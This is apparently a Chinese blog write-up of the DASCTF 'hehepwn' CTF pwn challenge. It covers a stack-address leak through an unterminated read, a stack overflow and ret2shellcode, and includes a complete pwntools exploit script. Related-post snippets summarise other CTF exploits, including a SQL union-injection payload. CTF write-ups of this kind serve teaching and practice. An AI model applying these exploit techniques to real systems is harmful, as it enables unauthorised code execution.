DASCTF-hehepwn writeup

最新推荐文章于 2024-08-24 23:20:54 发布
原创 最新推荐文章于 2024-08-24 23:20:54 发布 · 299 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

本文详细介绍了如何利用程序存在的栈溢出和内存泄露漏洞,通过IDA分析,发现可以执行栈上的shellcode。在调试过程中,揭示了堆块泄露的栈地址,并成功构造payload覆盖返回地址,最终实现RET2Shellcode攻击。实验过程结合gdb进行,展示了漏洞利用的完整流程。

DASCTF-hehepwn writeup

已上传网盘,方便复现

链接:https://pan.baidu.com/s/1ceYwALaUJn6TIS2eK9TN8w
提取码:ynzg

分析程序

没有开启任何保护,这里注意到开启了栈可执行,存在rwx字段,那么之后可以尝试在栈上执行ret2shellcode
请添加图片描述
使用ida分析程序

在这里可以看到存在堆上内容的泄露

strdup:strdup()会先用maolloc()配置与参数s 字符串相同的空间大小,然后将参数s 字符串的内容复制到该内存地址,然后把该地址返回。该地址最后可以利用free()来释放。

那么我们将read的0x20字全部填充,在没有字符串结尾的情况下,printf就会打印出堆块之后地址的内容
请添加图片描述
main函数中存在栈溢出,没有canary,可以直接覆盖返回地址

请添加图片描述

进行尝试

直到这里还并不知道该怎么攻击,不过既然有一个内存泄露,就先看看泄露出了什么

利用gdb进行调试

请添加图片描述
然后意外的发现,紧跟着我们申请的堆块后的被我们泄露出的地址是栈上的地址

继续跟踪发现是rbp的地址

那么既然泄露出了栈地址,又开启了栈可执行,我们就在栈上ret2shellcode了

exp

from pwn import *

context(log_level = 'debug', arch = 'amd64', os = 'linux')

io = process('./bypwn')
# io = remote('node4.buuoj.cn', 27761)
elf = ELF('./bypwn')
gdb.attach(io)

io.recvuntil(b'well you input:\n')
io.sendline(b'a' * (0x20 - 4) + b'bbbb')
io.recvuntil('bbbb')
#调试发现可泄漏地址为rbp
rbp = u64(io.recv(6).ljust(8, b'\x00'))
print(hex(rbp))

stack = rbp - 0x50

io.recvuntil(b'EASY PWN PWN PWN~\n')

shellcode = asm(shellcraft.sh())
shellcode = shellcode.ljust(0x58, b'a')

payload = shellcode + p64(stack)

io.sendline(payload)

io.interactive()
pwnDASCTF Sept 九月赛
woodwhale的博客
09-26 3830
pwnDASCTF Sept 月赛 1、hehepwn 先查看保护,栈可执行,想到shellcode 这题需要注意shellcode的写法 拖入ida中分析 一直以为iso scanf不能栈溢出,后来发现我是shabi 先进入sub_4007F9()函数 有个read函数,恰好读完s数组,由于printf是碰到\x00截断,所以如果我们输满0x20个padding就可以读取一个栈地址 我们可以把shellcode写入scanf输入的地址中,通过创建fake rbp进行栈迁移,而这个栈中存有我们写入
2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn hahapwn
yongbaoii的博客
09-27 321
有个strdup要注意一下。 有溢出。 通过strdup泄露栈地址,栈上布置shellcode,跳过去就好啦 exp from pwn import* context.log_level='debug' context.arch='amd64' context.os = "linux" context.terminal = ["tmux", "splitw", "-h"] local = 1 if local: r = process('./1111111') else: r = re
DASCTF X GFCTF 2022十月挑战赛 - pwn
z1r0的博客
10-28 1017
所以思路很好想出来,首先可以利用rax来控制rsi进行read任意写,再利用rax控制rsi到read_got这里进行任意地址写,写成syscall。这个时候我们把rax设置成0x3b也就是execve,控制rdi为bin_sh,把rsi和rdx置为0,最后直接调用read就可以getshell了。发现了这一个gadget,而404018正好是bss的地址,可读可写,所以我们可以利用上面第一次的任意地址写将bss这里的地址写成bin_sh。这里的地方,并且最后还可以控制ret。
DASCTF9月赛pwn-wp
Stella_Leo的博客
09-28 1709
DASCTF-2021-9月 头一次打安恒月赛,体验还不错,没有足够的时间,稍微看了下pwn,两个栈是我没想到的,然后还有一个heap题目,然而还需要先绕过re认证才能正常的pwn也是我没想到的。。 文章不贴图片了,较简单 hehepwn 啥保护没开 这是最简单的,就一个scanf明显的溢出,然后strdup函数那里,可以写满s把\x00打没了,然后泄露rbp,然后就是ret2shellcode exp #coding:utf-8 from pwn import * context.log_level='d
DASCTF 2023六月挑战赛|二进制专项 PWN (下)
susu_xiaosu的博客
07-23 1996
【代码】DASCTF 2023六月挑战赛|二进制专项 PWN (下)
DASCTF-三月赛-web题复现
weixin_45800126的博客
04-15 1149
title: DASCTF 三月赛 web题复现 date: 2021-04-07 15:04:52 tags: DASCTF BestDB 0x01 源码给了查询语句 $sql = "SELECT * FROM users WHERE id = '$query' OR username = \"$query\""; 过滤单引号,但没过滤双引号,所以选择闭合后面的用户名进行union查询 查表名 query=-1"/**/union/**/select/**/group_concat(table_na.
upload-labs-writeup-master.zip
10-25
【标题】"upload-labs-writeup-master.zip" 涉及的是一个关于上传漏洞实验室的环境搭建资源。这个压缩包包含了一个完整的实验环境,目的是帮助用户理解和学习如何防范和检测Web应用中的上传漏洞。 【描述】中提到,...
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
精选资源
GKCTF2021-官方WriteUp.pdf
07-06
【标题】:GKCTF2021-官方WriteUp.pdf 【描述】:GKCTF2021-官方WriteUp.pdf 【标签】:wp writeup 这些标题和描述表明,文件是一份关于GKCTF2021(一个网络安全竞赛,CTF代表Capture The Flag)的官方攻略...
Hercules-HTB-writeUp
最新发布
10-23
在本文中,我们将深入探讨Hercules-HTB-writeUp的相关扫描结果,涵盖大量涉及活动目录(Active Directory)中对象权限和角色的详细信息。通过对给定内容的细致分析,我们可以发现这是一系列与活动目录安全相关的具体...
DASCTF&BJDCTF 3rd 三道PWN题复现
weixin_44145820的博客
06-21 993
最近看了一下上次安恒五月赛没做出的几道PWN题,感觉自己水平还是不够,还要多学习 easybabystack(格式化字符串*, ret2csu) 这题有个栈溢出漏洞 但是必须输入正确的密码,否则就直接退出了 还有个格式化字符串漏洞 字符串长度为12 由于密码是/dev/urandom生成的,无法预测。 这里需要利用格式化字符串漏洞的’*'号 %*num$d从栈中取变量作为N 比如num$处的值是0x100,那么这个格式化字符串就相当于%256d 而密码位于18$的位置,我们使用%*18$c就可以打
DASCTF 2023六月挑战赛|二进制专项 PWN
weixin_51890658的博客
06-05 561
通过ida分析和gdb调试i在rbp-c中,它是int类型占4字节,还有两次格式化字符串漏洞,可通过这两次修改为i的值,第一次是把args参数链修改为i地址,第二次是修改i值即可再次使用格式化字符串漏洞。因为有堆溢出和uaf,可以伪装fastchunk,通过gdb调试0x602095地址的值为0x7f,可伪装。64位,也给了libc库,开了canary和pie地址随机 拖入ida看存在格式化字符串漏洞,有3次。64位的,给了libc库,开了canary,拖入ida分析,在edit函数中存在堆溢出。
DASCTF 2023六月挑战赛|二进制专项 PWN (上)
susu_xiaosu的博客
07-22 473
【代码】DASCTF 2023六月挑战赛|二进制专项 PWN (上)
DASCTF2024八月-pwn部分题解
qq_41683953的博客
08-24 808
DASCTF2024八月开学季,PWN,clock,randArray
[DASCTF 2023六月挑战赛|二进制专项] 5个pwn
weixin_52640415的博客
06-04 1997
格式化字符串漏洞利用argv链 6次free的off_by_null printf改system
DASCTF 2020安恒月赛 4月 pwn1---echo server题解
qy201706的博客
05-08 1219
学到了利用printf泄露libc,以前都只会puts… 0x1 checksec: 0x2 拖进ida: 显然进入sub_4006A7(): 厉害了自定义写入长度,明显的栈溢出 0x88个’a’可覆盖返回地址: 0x3 无system、’/bin/sh’ 泄露libc来做 0x4 printf泄露地址的详解(选择泄露__libc_start_main): 不知道ROP链怎么写,直接去程序里找汇编代码现学!! 发现程序最后的printf(“hello %s”, &s); 到g
2021dasctf七月赛 pwn题解复现(strdup,md5,protect,setcontext)
weixin_46521144的博客
08-09 1192
前言:算是第一次参加自己觉得能力匹配的比赛之前的0ctf,tctf的,感觉自己就像个混子,2021国赛参加的时候全程都在学没学过的堆,所以其实也没觉得自己能力赶得上。然而第一次打比赛嘛,总归是不可能会做的,不过也算是知道了,比赛也没有想象中的那么恐怖。 本篇文章参考的wp https://kr0emer.com/2021/08/04/DASCTF%20July%20X%20CBCTF%204th%20pwn/ Easyheap 保护全开,也开了沙箱,但是同时也开了一块RWX的段,地址是固定的0x233300
2021DASCTF July X CBCTF pwn wp
qq_39948058的博客
08-26 381
此题是7月末的比赛,本人旧博客搬到新博客啦,各位见谅哈(实际就是没钱租用服务器啦呜呜) **EasyHeap wp: Edit有堆溢出,有沙箱,禁用了execute,freehook为setcontext+5361即可,尝试orw就行了。写shellcode到hook,赋予权限即可,** exp: from pwn import * context(os='linux',arch='amd64',log_level='debug') p=process('./Easyheap') p=rem
DASCTF 7月赋能赛pwn wp
N1rvana的博客
07-25 604
DASCTF 7月赋能赛pwn wp
CTF-writeup:深入探索JavaScript技术
“压缩包子文件的文件名称列表”中出现了“CTF-writeup-master”,这个名字暗示了这个文件可能是CTF-writeup文档的主文件或者是在某个版本控制系统(如Git)中的主分支名称。在软件开发中,master分支通常是指向最新...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值